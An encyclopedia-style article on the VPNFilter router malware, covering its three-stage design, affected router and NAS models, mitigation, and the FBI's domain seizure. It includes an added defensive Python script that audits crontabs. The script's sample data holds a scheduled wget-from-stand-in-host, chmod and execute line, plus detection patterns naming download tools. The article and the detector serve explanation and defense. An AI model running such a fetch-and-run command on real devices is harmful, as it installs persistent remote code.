VPNFilter

VPNFilter is malware designed to infect routers and certain network attached storage devices. As of 24 May 2018, it is estimated to have infected approximately 500,000 routers worldwide, though the number of at-risk devices is larger. It can steal data, contains a "kill switch" designed to disable the infected router on command, and is able to persist should the user reboot the router. The FBI believes that it was created by the Russian Fancy Bear group. The FBI later announced that it believes Fancy Bear and Sandworm (also known as Voodoo Bear) are the same group. In February 2022, CISA announced that a new malware called Cyclops Blink, produced by Sandworm, had replaced VPNFilter.


Operation

VPNFilter is malware infecting a number of different kinds of network routers and storage devices. It seems to be designed in part to target serial networking devices using the Modbus protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems using SCADA.[ref: VPNFilter: New Router Malware with Destructive Capabilities] The initial infection vector is still unknown. The Cisco Talos security group hypothesizes that the malware exploits known router security vulnerabilities to infect devices. The software installs itself in multiple stages:

1. Stage 1 involves a worm which adds code to the device's crontab (the list of tasks run at regular intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install the Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.
2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by the special, optional Stage 3 modules.
3. Stage 3 can be any of various "modules" that tell the malware to do specific things, like sniffing network data, gathering credentials, serving as a relay point to hide the origin of subsequent attacks, or collecting data on industrial control devices (Modbus SCADA). Any exfiltrated data can then be encrypted via the Tor network.
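The Stage 1 persistence described above relies on a crontab entry that re-fetches later stages after a reboot. The following audit script is an added example, not code from the article or from any vendor report: it parses a crontab and flags entries that download on a schedule or execute from scratch or hidden directories. The sample crontab, the file names and the heuristics are all constructed for illustration and are not VPNFilter's actual artifacts.

```python
import re

# Constructed sample crontab, not a real VPNFilter artifact: the last two
# lines illustrate the persistence pattern the text describes (a scheduled
# task that re-fetches or re-launches later stages from a writable path).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/bin/ntpclient -s -h pool.ntp.org
*/10 * * * * /var/tmp/.s/update.sh
*/15 * * * * wget -q -O /tmp/st2 http://example.invalid/update && chmod +x /tmp/st2 && /tmp/st2
"""

# Heuristics (assumptions for this example): network download tools,
# execution from writable scratch directories, and hidden dot-directories.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
SCRATCH_DIRS = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+/")

def parse_crontab(text):
    """Yield (schedule, command) tuples, skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # malformed entry; a real audit would report it
        yield " ".join(fields[:5]), fields[5]

def audit_crontab(text):
    """Return [(command, [reasons])] for entries that look like network
    re-fetch or scratch-directory persistence; legitimate jobs return []."""
    findings = []
    for _schedule, cmd in parse_crontab(text):
        reasons = []
        if DOWNLOADERS.search(cmd):
            reasons.append("downloads from the network on a schedule")
        if SCRATCH_DIRS.search(cmd):
            reasons.append("executes from a writable scratch directory")
        if HIDDEN_PATH.search(cmd):
            reasons.append("uses a hidden dot-directory")
        if reasons:
            findings.append((cmd, reasons))
    return findings

if __name__ == "__main__":
    for cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS: {cmd}\n  - " + "\n  - ".join(reasons))
```

On the constructed sample the two legitimate jobs pass and the two persistence-style entries are reported with the reasons that matched.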


Mitigation

Both Cisco and Symantec suggest that people who own affected devices do a factory reset. That is typically accomplished by using a small, pointed object, such as a straightened-out paperclip, to push the small reset button on the back of the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but also restores the router to all original settings. If the router has remote management enabled, a factory reset will often disable it (remote management is off by default on many routers). Remote management is thought to be one possible vector for the initial attack. Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection.


Devices at risk

The initial worm that installs VPNFilter can only attack devices running embedded firmware based on BusyBox on Linux, compiled only for specific processors. This does not include non-embedded Linux devices such as workstations and servers. Manufacturer-provided firmware on the following router models is known to be at risk:

* Asus: RT-AX92U, RT-AC66U, RT-N10, RT-N10E, RT-N10U, RT-N56U, RT-N66U
* D-Link: DES-1210-08P, DIR-300, DIR-300A, DSR-250N, DSR-500N, DSR-1000, DSR-1000N
* Huawei: HG8245
* Linksys: E1200, E2500, E3000, E3200, E4200, RV082, WRVS4400N
* Mikrotik: CCR1009, CCR1016, CCR1036, CCR1072, CRS109, CRS112, CRS125, RB411, RB450, RB750, RB911, RB921, RB941, RB951, RB952, RB960, RB962, RB1100, RB1200, RB2011, RB3011, RB Groove, RB Omnitik, STX5; Mikrotik RouterOS versions up to 6.38.5 on the current release chain or 6.37.5 on the bugfix release chain
* Netgear: DG834, DGN1000, DGN2200, DGN3500, FVS318N, MBRN3000, R6400, R7000, R8000, WNR1000, WNR2000, WNR2200, WNR4000, WNDR3700, WNDR4000, WNDR4300, WNDR4300-TN, UTM50
* QNAP: TS251, TS439 Pro, and other QNAP NAS devices running QTS software
* TP-Link: R600VPN, TL-WR741ND, TL-WR841N
* Ubiquiti: NSM2, PBE M5
* Upvel: unknown models (malware targeting Upvel as a vendor has been discovered, but the specific devices it targets could not be determined)
* ZTE: ZXHN H108N


Epidemiology

VPNFilter is described by Cisco Talos as having infected as many as 500,000 devices worldwide, in perhaps 54 different countries, though proportionately the focus has been on Ukraine.


FBI investigation

The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall.com as ostensibly having been used to redirect queries from Stage 1 of the malware, allowing it to locate and install copies of Stages 2 and 3.[ref: FBI to all router users: Reboot now to neuter Russia's VPNFilter malware] The US Justice Department also compelled the site Photobucket to disable known URLs used to distribute the malware's Stage 2.


FBI recommendation on removing the infection

On 25 May 2018, the FBI recommended that users reboot their at-risk devices. This would temporarily remove Stages 2 and 3 of the malware. Stage 1 would remain, leading the router to try re-downloading the payload and infecting the router again. However, prior to the recommendation the US Justice Department seized the web endpoints the malware uses for Stage 2 installation. Without these URLs, the malware must rely on the fallback socket listener for Stage 2 installation. This method requires the threat actor's command and control systems to contact each system to install Stage 2, increasing the threat actor's risk of being identified. The FBI further recommended that users disable remote management on their devices and update the firmware. A firmware update removes all stages of the malware, though it is possible the device could be reinfected. The FBI said that this would help them to find the servers distributing the payload.


See also

* Cyclops Blink